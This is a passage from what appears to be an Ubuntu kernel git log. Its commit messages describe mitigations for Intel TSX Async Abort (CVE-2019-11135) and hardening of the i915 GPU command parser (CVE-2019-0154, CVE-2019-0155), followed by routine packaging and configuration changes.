Synchronization Extensions (TSX) feature by default. TSX can only be
disable on certain, newer processors that support the IA32_TSX_CTRL MSR
via a microcode update. Intel says that future processors will also
support the MSR. On processors that support the MSR, TSX will be
disabled unless the system administrator overrides the configuration
with the "tsx" kernel command line option.

CVE-2019-11135

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agox86/tsx: Add config options to set tsx=on|off|auto
Michal Hocko [Wed, 23 Oct 2019 10:35:50 +0000 (12:35 +0200)]
x86/tsx: Add config options to set tsx=on|off|auto

commit db616173d787395787ecc93eef075fa975227b10 upstream

There is a general consensus that TSX usage is not largely spread while
the history shows there is a non trivial space for side channel attacks
possible. Therefore the tsx is disabled by default even on platforms
that might have a safe implementation of TSX according to the current
knowledge. This is a fair trade off to make.

There are, however, workloads that really do benefit from using TSX and
updating to a newer kernel with TSX disabled might introduce a
noticeable regressions. This would be especially a problem for Linux
distributions which will provide TAA mitigations.

Introduce config options X86_INTEL_TSX_MODE_OFF, X86_INTEL_TSX_MODE_ON
and X86_INTEL_TSX_MODE_AUTO to control the TSX feature. The config
setting can be overridden by the tsx cmdline options.

 [ bp: Text cleanups from Josh. ]

Suggested-by: Borislav Petkov <bpetkov@suse.de>
Signed-off-by: Michal Hocko <mhocko@suse.com>
Signed-off-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
Signed-off-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Reviewed-by: Josh Poimboeuf <jpoimboe@redhat.com>
CVE-2019-11135

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agox86/speculation/taa: Add documentation for TSX Async Abort
Pawan Gupta [Wed, 23 Oct 2019 10:32:55 +0000 (12:32 +0200)]
x86/speculation/taa: Add documentation for TSX Async Abort

commit a7a248c593e4fd7a67c50b5f5318fe42a0db335e upstream

Add the documenation for TSX Async Abort. Include the description of
the issue, how to check the mitigation state, control the mitigation,
guidance for system administrators.

 [ bp: Add proper SPDX tags, touch ups by Josh and me. ]

Co-developed-by: Antonio Gomez Iglesias <antonio.gomez.iglesias@intel.com>
Signed-off-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
Signed-off-by: Antonio Gomez Iglesias <antonio.gomez.iglesias@intel.com>
Signed-off-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Reviewed-by: Mark Gross <mgross@linux.intel.com>
Reviewed-by: Tony Luck <tony.luck@intel.com>
Reviewed-by: Josh Poimboeuf <jpoimboe@redhat.com>
CVE-2019-11135

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agox86/tsx: Add "auto" option to the tsx= cmdline parameter
Pawan Gupta [Wed, 23 Oct 2019 10:28:57 +0000 (12:28 +0200)]
x86/tsx: Add "auto" option to the tsx= cmdline parameter

commit 7531a3596e3272d1f6841e0d601a614555dc6b65 upstream

Platforms which are not affected by X86_BUG_TAA may want the TSX feature
enabled. Add "auto" option to the TSX cmdline parameter. When tsx=auto
disable TSX when X86_BUG_TAA is present, otherwise enable TSX.

More details on X86_BUG_TAA can be found here:
https://www.kernel.org/doc/html/latest/admin-guide/hw-vuln/tsx_async_abort.html

 [ bp: Extend the arg buffer to accommodate "auto\0". ]

Signed-off-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
Signed-off-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Reviewed-by: Tony Luck <tony.luck@intel.com>
Reviewed-by: Josh Poimboeuf <jpoimboe@redhat.com>
CVE-2019-11135

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agokvm/x86: Export MDS_NO=0 to guests when TSX is enabled
Pawan Gupta [Wed, 23 Oct 2019 10:23:33 +0000 (12:23 +0200)]
kvm/x86: Export MDS_NO=0 to guests when TSX is enabled

commit e1d38b63acd843cfdd4222bf19a26700fd5c699e upstream

Export the IA32_ARCH_CAPABILITIES MSR bit MDS_NO=0 to guests on TSX
Async Abort(TAA) affected hosts that have TSX enabled and updated
microcode. This is required so that the guests don't complain,

  "Vulnerable: Clear CPU buffers attempted, no microcode"

when the host has the updated microcode to clear CPU buffers.

Microcode update also adds support for MSR_IA32_TSX_CTRL which is
enumerated by the ARCH_CAP_TSX_CTRL bit in IA32_ARCH_CAPABILITIES MSR.
Guests can't do this check themselves when the ARCH_CAP_TSX_CTRL bit is
not exported to the guests.

In this case export MDS_NO=0 to the guests. When guests have
CPUID.MD_CLEAR=1, they deploy MDS mitigation which also mitigates TAA.

Signed-off-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
Signed-off-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Tested-by: Neelima Krishnan <neelima.krishnan@intel.com>
Reviewed-by: Tony Luck <tony.luck@intel.com>
Reviewed-by: Josh Poimboeuf <jpoimboe@redhat.com>
CVE-2019-11135

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agox86/speculation/taa: Add sysfs reporting for TSX Async Abort
Pawan Gupta [Wed, 23 Oct 2019 10:19:51 +0000 (12:19 +0200)]
x86/speculation/taa: Add sysfs reporting for TSX Async Abort

commit 6608b45ac5ecb56f9e171252229c39580cc85f0f upstream

Add the sysfs reporting file for TSX Async Abort. It exposes the
vulnerability and the mitigation state similar to the existing files for
the other hardware vulnerabilities.

Sysfs file path is:
/sys/devices/system/cpu/vulnerabilities/tsx_async_abort

Signed-off-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
Signed-off-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Tested-by: Neelima Krishnan <neelima.krishnan@intel.com>
Reviewed-by: Mark Gross <mgross@linux.intel.com>
Reviewed-by: Tony Luck <tony.luck@intel.com>
Reviewed-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Reviewed-by: Josh Poimboeuf <jpoimboe@redhat.com>
CVE-2019-11135

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agox86/speculation/taa: Add mitigation for TSX Async Abort
Pawan Gupta [Wed, 23 Oct 2019 09:30:45 +0000 (11:30 +0200)]
x86/speculation/taa: Add mitigation for TSX Async Abort

commit 1b42f017415b46c317e71d41c34ec088417a1883 upstream

TSX Async Abort (TAA) is a side channel vulnerability to the internal
buffers in some Intel processors similar to Microachitectural Data
Sampling (MDS). In this case, certain loads may speculatively pass
invalid data to dependent operations when an asynchronous abort
condition is pending in a TSX transaction.

This includes loads with no fault or assist condition. Such loads may
speculatively expose stale data from the uarch data structures as in
MDS. Scope of exposure is within the same-thread and cross-thread. This
issue affects all current processors that support TSX, but do not have
ARCH_CAP_TAA_NO (bit 8) set in MSR_IA32_ARCH_CAPABILITIES.

On CPUs which have their IA32_ARCH_CAPABILITIES MSR bit MDS_NO=0,
CPUID.MD_CLEAR=1 and the MDS mitigation is clearing the CPU buffers
using VERW or L1D_FLUSH, there is no additional mitigation needed for
TAA. On affected CPUs with MDS_NO=1 this issue can be mitigated by
disabling the Transactional Synchronization Extensions (TSX) feature.

A new MSR IA32_TSX_CTRL in future and current processors after a
microcode update can be used to control the TSX feature. There are two
bits in that MSR:

* TSX_CTRL_RTM_DISABLE disables the TSX sub-feature Restricted
Transactional Memory (RTM).

* TSX_CTRL_CPUID_CLEAR clears the RTM enumeration in CPUID. The other
TSX sub-feature, Hardware Lock Elision (HLE), is unconditionally
disabled with updated microcode but still enumerated as present by
CPUID(EAX=7).EBX{bit4}.

The second mitigation approach is similar to MDS which is clearing the
affected CPU buffers on return to user space and when entering a guest.
Relevant microcode update is required for the mitigation to work.  More
details on this approach can be found here:

  https://www.kernel.org/doc/html/latest/admin-guide/hw-vuln/mds.html

The TSX feature can be controlled by the "tsx" command line parameter.
If it is force-enabled then "Clear CPU buffers" (MDS mitigation) is
deployed. The effective mitigation state can be read from sysfs.

 [ bp:
   - massage + comments cleanup
   - s/TAA_MITIGATION_TSX_DISABLE/TAA_MITIGATION_TSX_DISABLED/g - Josh.
   - remove partial TAA mitigation in update_mds_branch_idle() - Josh.
   - s/tsx_async_abort_cmdline/tsx_async_abort_parse_cmdline/g
 ]

Signed-off-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
Signed-off-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Reviewed-by: Josh Poimboeuf <jpoimboe@redhat.com>
CVE-2019-11135

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agox86/cpu: Add a "tsx=" cmdline option with TSX disabled by default
Pawan Gupta [Wed, 23 Oct 2019 09:01:53 +0000 (11:01 +0200)]
x86/cpu: Add a "tsx=" cmdline option with TSX disabled by default

commit 95c5824f75f3ba4c9e8e5a4b1a623c95390ac266 upstream

Add a kernel cmdline parameter "tsx" to control the Transactional
Synchronization Extensions (TSX) feature. On CPUs that support TSX
control, use "tsx=on|off" to enable or disable TSX. Not specifying this
option is equivalent to "tsx=off". This is because on certain processors
TSX may be used as a part of a speculative side channel attack.

Carve out the TSX controlling functionality into a separate compilation
unit because TSX is a CPU feature while the TSX async abort control
machinery will go to cpu/bugs.c.

 [ bp: - Massage, shorten and clear the arg buffer.
       - Clarifications of the tsx= possible options - Josh.
       - Expand on TSX_CTRL availability - Pawan. ]

Signed-off-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
Signed-off-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Reviewed-by: Josh Poimboeuf <jpoimboe@redhat.com>
CVE-2019-11135

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agox86/cpu: Add a helper function x86_read_arch_cap_msr()
Pawan Gupta [Wed, 23 Oct 2019 08:52:35 +0000 (10:52 +0200)]
x86/cpu: Add a helper function x86_read_arch_cap_msr()

commit 286836a70433fb64131d2590f4bf512097c255e1 upstream

Add a helper function to read the IA32_ARCH_CAPABILITIES MSR.

Signed-off-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
Signed-off-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Tested-by: Neelima Krishnan <neelima.krishnan@intel.com>
Reviewed-by: Mark Gross <mgross@linux.intel.com>
Reviewed-by: Tony Luck <tony.luck@intel.com>
Reviewed-by: Josh Poimboeuf <jpoimboe@redhat.com>
CVE-2019-11135

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agox86/msr: Add the IA32_TSX_CTRL MSR
Pawan Gupta [Wed, 23 Oct 2019 08:45:50 +0000 (10:45 +0200)]
x86/msr: Add the IA32_TSX_CTRL MSR

commit c2955f270a84762343000f103e0640d29c7a96f3 upstream

Transactional Synchronization Extensions (TSX) may be used on certain
processors as part of a speculative side channel attack.  A microcode
update for existing processors that are vulnerable to this attack will
add a new MSR - IA32_TSX_CTRL to allow the system administrator the
option to disable TSX as one of the possible mitigations.

The CPUs which get this new MSR after a microcode upgrade are the ones
which do not set MSR_IA32_ARCH_CAPABILITIES.MDS_NO (bit 5) because those
CPUs have CPUID.MD_CLEAR, i.e., the VERW implementation which clears all
CPU buffers takes care of the TAA case as well.

  [ Note that future processors that are not vulnerable will also
    support the IA32_TSX_CTRL MSR. ]

Add defines for the new IA32_TSX_CTRL MSR and its bits.

TSX has two sub-features:

1. Restricted Transactional Memory (RTM) is an explicitly-used feature
   where new instructions begin and end TSX transactions.
2. Hardware Lock Elision (HLE) is implicitly used when certain kinds of
   "old" style locks are used by software.

Bit 7 of the IA32_ARCH_CAPABILITIES indicates the presence of the
IA32_TSX_CTRL MSR.

There are two control bits in IA32_TSX_CTRL MSR:

  Bit 0: When set, it disables the Restricted Transactional Memory (RTM)
         sub-feature of TSX (will force all transactions to abort on the
 XBEGIN instruction).

  Bit 1: When set, it disables the enumeration of the RTM and HLE feature
         (i.e. it will make CPUID(EAX=7).EBX{bit4} and
  CPUID(EAX=7).EBX{bit11} read as 0).

The other TSX sub-feature, Hardware Lock Elision (HLE), is
unconditionally disabled by the new microcode but still enumerated
as present by CPUID(EAX=7).EBX{bit4}, unless disabled by
IA32_TSX_CTRL_MSR[1] - TSX_CTRL_CPUID_CLEAR.

Signed-off-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
Signed-off-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Tested-by: Neelima Krishnan <neelima.krishnan@intel.com>
Reviewed-by: Mark Gross <mgross@linux.intel.com>
Reviewed-by: Tony Luck <tony.luck@intel.com>
Reviewed-by: Josh Poimboeuf <jpoimboe@redhat.com>
CVE-2019-11135

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915/gen8+: Add RC6 CTX corruption WA
Imre Deak [Mon, 9 Jul 2018 15:24:27 +0000 (18:24 +0300)]
UBUNTU: SAUCE: drm/i915/gen8+: Add RC6 CTX corruption WA

CVE-2019-0154

In some circumstances the RC6 context can get corrupted. We can detect
this and take the required action, that is disable RC6 and runtime PM.
The HW recovers from the corrupted state after a system suspend/resume
cycle, so detect the recovery and re-enable RC6 and runtime PM.

v2: rebase (Mika)
v3:
- Move intel_suspend_gt_powersave() to the end of the GEM suspend
  sequence.
- Add commit message.
v4:
- Rebased on intel_uncore_forcewake_put(i915->uncore, ...) API
  change.
v5: rebased on gem/gt split (Mika)

Signed-off-by: Imre Deak <imre.deak@intel.com>
Signed-off-by: Mika Kuoppala <mika.kuoppala@linux.intel.com>
[tyhicks: Backport to 5.3
 - Minor context changes]
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
4 years agoUBUNTU: SAUCE: drm/i915: Lower RM timeout to avoid DSI hard hangs
Uma Shankar [Tue, 7 Aug 2018 15:45:35 +0000 (21:15 +0530)]
UBUNTU: SAUCE: drm/i915: Lower RM timeout to avoid DSI hard hangs

CVE-2019-0154

In BXT/APL, device 2 MMIO reads from MIPI controller requires its PLL
to be turned ON. When MIPI PLL is turned off (MIPI Display is not
active or connected), and someone (host or GT engine) tries to read
MIPI registers, it causes hard hang. This is a hardware restriction
or limitation.

Driver by itself doesn't read MIPI registers when MIPI display is off.
But any userspace application can submit unprivileged batch buffer for
execution. In that batch buffer there can be mmio reads. And these
reads are allowed even for unprivileged applications. If these
register reads are for MIPI DSI controller and MIPI display is not
active during that time, then the MMIO read operation causes system
hard hang and only way to recover is hard reboot. A genuine
process/application won't submit batch buffer like this and doesn't
cause any issue. But on a compromised system, a malign userspace
process/app can generate such batch buffer and can trigger system
hard hang (denial of service attack).

The fix is to lower the internal MMIO timeout value to an optimum
value of 950us as recommended by hardware team. If the timeout is
beyond 1ms (which will hit for any value we choose if MMIO READ on a
DSI specific register is performed without PLL ON), it causes the
system hang. But if the timeout value is lower than it will be below
the threshold (even if timeout happens) and system will not get into
a hung state. This will avoid a system hang without losing any
programming or GT interrupts, taking the worst case of lowest CDCLK
frequency and early DC5 abort into account.

Signed-off-by: Uma Shankar <uma.shankar@intel.com>
Reviewed-by: Jon Bloomfield <jon.bloomfield@intel.com>
[tyhicks: Backport to 5.3
 - Minor context adjustment in i915_reg.h]
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915/cmdparser: Ignore Length operands during command matching
Jon Bloomfield [Thu, 20 Sep 2018 16:45:10 +0000 (09:45 -0700)]
UBUNTU: SAUCE: drm/i915/cmdparser: Ignore Length operands during command matching

CVE-2019-0155

Some of the gen instruction macros (e.g. MI_DISPLAY_FLIP) have the
length directly encoded in them. Since these are used directly in
the tables, the Length becomes part of the comparison used for
matching during parsing. Thus, if the cmd being parsed has a
different length to that in the table, it is not matched and the
cmd is accepted via the default variable length path.

Fix by masking out everything except the Opcode in the cmd tables

Signed-off-by: Jon Bloomfield <jon.bloomfield@intel.com>
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915/cmdparser: Add support for backward jumps
Jon Bloomfield [Thu, 20 Sep 2018 16:58:36 +0000 (09:58 -0700)]
UBUNTU: SAUCE: drm/i915/cmdparser: Add support for backward jumps

CVE-2019-0155

To keep things manageable, the pre-gen9 cmdparser does not
attempt to track any form of nested BB_START's. This did not
prevent usermode from using nested starts, or even chained
batches because the cmdparser is not strictly enforced pre gen9.

Instead, the existence of a nested BB_START would cause the batch
to be emitted in insecure mode, and any privileged capabilities
would not be available.

For Gen9, the cmdparser becomes mandatory (for BCS at least), and
so not providing any form of nested BB_START support becomes
overly restrictive. Any such batch will simply not run.

We make heavy use of backward jumps in igt, and it is much easier
to add support for this restricted subset of nested jumps, than to
rewrite the whole of our test suite to avoid them.

Add the required logic to support limited backward jumps, to
instructions that have already been validated by the parser.

Note that it's not sufficient to simply approve any BB_START
that jumps backwards in the buffer because this would allow an
attacker to embed a rogue instruction sequence within the
operand words of a harmless instruction (say LRI) and jump to
that.

We introduce a bit array to track every instr offset successfully
validated, and test the target of BB_START against this. If the
target offset hits, it is re-written to the same offset in the
shadow buffer and the BB_START cmd is allowed.

Note: This patch deliberately ignores checkpatch issues in the
cmdtables, in order to match the style of the surrounding code.
We'll correct the entire file in one go in a later patch.

v2: set dispatch secure late (Mika)
v3: rebase (Mika)
v4: Clear whitelist on each parse
    Minor review updates (Chris)
v5: Correct backward jump batching
v6: fix compilation error due to struct eb shuffle (Mika)

Signed-off-by: Jon Bloomfield <jon.bloomfield@intel.com>
Signed-off-by: Mika Kuoppala <mika.kuoppala@linux.intel.com>
[tyhicks: Backport to 5.3
 - Minor context adjustment in i915_gem_context_free()
 - Adjust for different parameters, stack variables, and jump labels in
   eb_parse()]
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915/cmdparser: Use explicit goto for error paths
Jon Bloomfield [Thu, 27 Sep 2018 17:23:17 +0000 (10:23 -0700)]
UBUNTU: SAUCE: drm/i915/cmdparser: Use explicit goto for error paths

CVE-2019-0155

In the next patch we will be adding a second valid
termination condition which will require a small
amount of refactoring to share logic with the BB_END
case.

Refactor all error conditions to jump to a dedicated
exit path, with 'break' reserved only for a successful
parse.

Signed-off-by: Jon Bloomfield <jon.bloomfield@intel.com>
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915: Add gen9 BCS cmdparsing
Jon Bloomfield [Mon, 23 Apr 2018 18:12:15 +0000 (11:12 -0700)]
UBUNTU: SAUCE: drm/i915: Add gen9 BCS cmdparsing

CVE-2019-0155

For gen9 we enable cmdparsing on the BCS ring, specifically
to catch inadvertent accesses to sensitive registers

Unlike gen7/hsw, we use the parser only to block certain
registers. We can rely on h/w to block restricted commands,
so the command tables only provide enough info to allow the
parser to delineate each command, and identify commands that
access registers.

Note: This patch deliberately ignores checkpatch issues in
favour of matching the style of the surrounding code. We'll
correct the entire file in one go in a later patch.

v3: rebase (Mika)
v4: Add RING_TIMESTAMP registers to whitelist (Jon)

Signed-off-by: Jon Bloomfield <jon.bloomfield@intel.com>
Cc: Joonas Lahtinen <joonas.lahtinen@intel.com>
Cc: Rodrigo Vivi <rodrigo.vivi@intel.com>
Signed-off-by: Mika Kuoppala <mika.kuoppala@linux.intel.com>
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915: Allow parsing of unsized batches
Jon Bloomfield [Wed, 1 Aug 2018 16:45:50 +0000 (09:45 -0700)]
UBUNTU: SAUCE: drm/i915: Allow parsing of unsized batches

CVE-2019-0155

In "drm/i915: Add support for mandatory cmdparsing" we introduced the
concept of mandatory parsing. This allows the cmdparser to be invoked
even when user passes batch_len=0 to the execbuf ioctl's.

However, the cmdparser needs to know the extents of the buffer being
scanned. Refactor the code to ensure the cmdparser uses the actual
object size, instead of the incoming length, if user passes 0.

Signed-off-by: Jon Bloomfield <jon.bloomfield@intel.com>
Cc: Joonas Lahtinen <joonas.lahtinen@intel.com>
Cc: Rodrigo Vivi <rodrigo.vivi@intel.com>
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915: Support ro ppgtt mapped cmdparser shadow buffers
Jon Bloomfield [Tue, 22 May 2018 20:59:06 +0000 (13:59 -0700)]
UBUNTU: SAUCE: drm/i915: Support ro ppgtt mapped cmdparser shadow buffers

CVE-2019-0155

For Gen7, the original cmdparser motive was to permit limited
use of register read/write instructions in unprivileged BB's.
This worked by copying the user supplied bb to a kmd owned
bb, and running it in secure mode, from the ggtt, only if
the scanner finds no unsafe commands or registers.

For Gen8+ we can't use this same technique because running bb's
from the ggtt also disables access to ppgtt space. But we also
do not actually require 'secure' execution since we are only
trying to reduce the available command/register set. Instead we
will copy the user buffer to a kmd owned read-only bb in ppgtt,
and run in the usual non-secure mode.

Note that ro pages are only supported by ppgtt (not ggtt), but
luckily that's exactly what we need.

Add the required paths to map the shadow buffer to ppgtt ro for Gen8+

v2: IS_GEN7/IS_GEN (Mika)
v3: rebase
v4: rebase
v5: rebase

Signed-off-by: Jon Bloomfield <jon.bloomfield@intel.com>
Cc: Joonas Lahtinen <joonas.lahtinen@intel.com>
Cc: Rodrigo Vivi <rodrigo.vivi@intel.com>
Signed-off-by: Mika Kuoppala <mika.kuoppala@linux.intel.com>
[tyhicks: Backport to 5.3
 - Adjust for different parameters, stack variables, and jump labels in
   eb_parse()]
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915: Add support for mandatory cmdparsing
Jon Bloomfield [Wed, 1 Aug 2018 16:33:59 +0000 (09:33 -0700)]
UBUNTU: SAUCE: drm/i915: Add support for mandatory cmdparsing

CVE-2019-0155

The existing cmdparser for gen7 can be bypassed by specifying
batch_len=0 in the execbuf call. This is safe because bypassing
simply reduces the cmd-set available.

In a later patch we will introduce cmdparsing for gen9, as a
security measure, which must be strictly enforced since without
it we are vulnerable to DoS attacks.

Introduce the concept of 'required' cmd parsing that cannot be
bypassed by submitting zero-length bb's.

v2: rebase (Mika)
v2: rebase (Mika)
v3: fix conflict on engine flags (Mika)

Signed-off-by: Jon Bloomfield <jon.bloomfield@intel.com>
Cc: Joonas Lahtinen <joonas.lahtinen@intel.com>
Cc: Rodrigo Vivi <rodrigo.vivi@intel.com>
Signed-off-by: Mika Kuoppala <mika.kuoppala@linux.intel.com>
[tyhicks: Backport to 5.3
 - Adjust flags list due to missing I915_ENGINE_HAS_RELATIVE_MMIO flag
 - Adjust context in for loop in i915_cmd_parser_get_version()]
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915: Remove Master tables from cmdparser
Jon Bloomfield [Fri, 8 Jun 2018 17:05:26 +0000 (10:05 -0700)]
UBUNTU: SAUCE: drm/i915: Remove Master tables from cmdparser

CVE-2019-0155

The previous patch has killed support for secure batches
on gen6+, and hence the cmdparsers master tables are
now dead code. Remove them.

Signed-off-by: Jon Bloomfield <jon.bloomfield@intel.com>
Cc: Joonas Lahtinen <joonas.lahtinen@intel.com>
Cc: Rodrigo Vivi <rodrigo.vivi@intel.com>
[tyhicks: Backport to 5.3
 - Adjust for different parameters and stack variables in eb_parse]
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915: Disable Secure Batches for gen6+
Jon Bloomfield [Fri, 8 Jun 2018 15:53:46 +0000 (08:53 -0700)]
UBUNTU: SAUCE: drm/i915: Disable Secure Batches for gen6+

CVE-2019-0155

Retroactively stop reporting support for secure batches
through the api for gen6+ so that older binaries trigger
the fallback path instead.

Older binaries use secure batches pre gen6 to access resources
that are not available to normal usermode processes. However,
all known userspace explicitly checks for HAS_SECURE_BATCHES
before relying on the secure batch feature.

Since there are no known binaries relying on this for newer gens
we can kill secure batches from gen6, via I915_PARAM_HAS_SECURE_BATCHES.

v2: rebase (Mika)
v3: rebase (Mika)

Signed-off-by: Jon Bloomfield <jon.bloomfield@intel.com>
Cc: Joonas Lahtinen <joonas.lahtinen@intel.com>
Cc: Rodrigo Vivi <rodrigo.vivi@intel.com>
Signed-off-by: Mika Kuoppala <mika.kuoppala@linux.intel.com>
[tyhicks: Backport to 5.3
 - i915_getparam_ioctl() is in 915_drv.c]
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915: Rename gen7 cmdparser tables
Jon Bloomfield [Fri, 20 Apr 2018 21:26:01 +0000 (14:26 -0700)]
UBUNTU: SAUCE: drm/i915: Rename gen7 cmdparser tables

CVE-2019-0155

We're about to introduce some new tables for later gens, and the
current naming for the gen7 tables will no longer make sense.

v2: rebase

Signed-off-by: Jon Bloomfield <jon.bloomfield@intel.com>
Cc: Joonas Lahtinen <joonas.lahtinen@intel.com>
Cc: Rodrigo Vivi <rodrigo.vivi@intel.com>
Signed-off-by: Mika Kuoppala <mika.kuoppala@linux.intel.com>
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Timo Aaltonen <tjaalton@ubuntu.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: Start new release
Stefan Bader [Mon, 4 Nov 2019 13:58:30 +0000 (14:58 +0100)]
UBUNTU: Start new release

Ignore: yes
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: Ubuntu-5.3.0-21.22
Khalid Elmously [Tue, 29 Oct 2019 21:18:36 +0000 (17:18 -0400)]
UBUNTU: Ubuntu-5.3.0-21.22

Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoUBUNTU: link-to-tracker: update tracking bug
Khalid Elmously [Tue, 29 Oct 2019 21:17:20 +0000 (17:17 -0400)]
UBUNTU: link-to-tracker: update tracking bug

BugLink: https://bugs.launchpad.net/bugs/1850486
Properties: no-test-build
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoUBUNTU: Start new release
Khalid Elmously [Tue, 29 Oct 2019 21:16:12 +0000 (17:16 -0400)]
UBUNTU: Start new release

Ignore: yes
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoUBUNTU: [Packaging] Leave unsigned modules unsigned after adding .gnu_debuglink
Seth Forshee [Tue, 29 Oct 2019 19:25:13 +0000 (14:25 -0500)]
UBUNTU: [Packaging] Leave unsigned modules unsigned after adding .gnu_debuglink

BugLink: https://bugs.launchpad.net/bugs/1850234
When adding .gnu_debuglink sections to modules we sign modules
without regard to whether or not they were signed previously. As
a result modules from staging which should not have been signed
are ending up with signature. Change this to check for a module
signature before modifying the binary, then sign the result only
if the original module was signed.

Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
Acked-by: Khalid Elmously <khalid.elmously@canonical.com>
Acked-by: Sultan Alsawaf <sultan.alsawaf@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoUBUNTU: Ubuntu-5.3.0-20.21 Ubuntu-5.3.0-20.21
Kleber Sacilotto de Souza [Wed, 23 Oct 2019 13:49:37 +0000 (15:49 +0200)]
UBUNTU: Ubuntu-5.3.0-20.21

Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
4 years agoUBUNTU: [Config] Enable SOF_HDA link and codec
Hui Wang [Thu, 17 Oct 2019 12:28:00 +0000 (14:28 +0200)]
UBUNTU: [Config] Enable SOF_HDA link and codec

BugLink: https://bugs.launchpad.net/bugs/1848490
The Eoan kernel already has alsa/sof driver, we need to enable SOF_HDA
link and codec, otherwise the dmic can't work on the Dell and Lenovo
machines which have the dmic directly connected to PCH.

Because the SOF_HDA depneds on the NOCODEC=n, we need to disable
SOF_NOCODEC.

Signed-off-by: Hui Wang <hui.wang@canonical.com>
